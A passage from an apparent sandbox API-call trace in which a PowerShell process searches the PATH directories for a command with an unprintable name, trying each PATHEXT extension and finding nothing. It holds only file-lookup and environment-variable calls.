lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.WSH" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.wsh"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.353] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.MSC" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.msc"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.353] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f.CPL" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f.cpl"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.354] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0280.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0280.354] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\\x9f" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\\x9f"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.354] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfee20 [0280.354] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x25b73cfee20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0280.354] CoTaskMemFree (pv=0x25b73cfee20) [0280.354] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0280.355] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x3a [0280.355] CoTaskMemFree (pv=0x25b73cfd8e0) [0280.355] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfdf40 [0280.355] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x25b73cfdf40, nSize=0x105 | out: lpBuffer="") returned 0x3a [0280.355] CoTaskMemFree (pv=0x25b73cfdf40) [0280.355] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d02120 [0280.355] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x25b73d02120, nSize=0x105 | out: lpBuffer="") returned 0x9c [0280.355] CoTaskMemFree (pv=0x25b73d02120) [0280.355] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0280.355] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x25b73d007a0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x1f [0280.355] CoTaskMemFree (pv=0x25b73d007a0) [0280.355] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.355] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.356] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.356] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.ps1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.ps1"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.356] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.356] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.356] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.356] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.psm1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.psm1"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.357] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.357] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.357] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.357] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.psd1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.psd1"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.357] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.357] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.357] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.357] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.COM" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.com"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.358] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.358] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.358] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.358] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.EXE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.exe"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.358] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.359] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.359] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.359] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.BAT" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.bat"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.359] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.359] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.359] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.359] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.CMD" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.cmd"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.360] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.360] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.360] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.360] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.VBS" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.vbs"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.360] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.361] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.361] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.361] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.VBE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.vbe"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.361] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.361] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.361] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.361] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.JS" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.js"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.362] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.362] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, 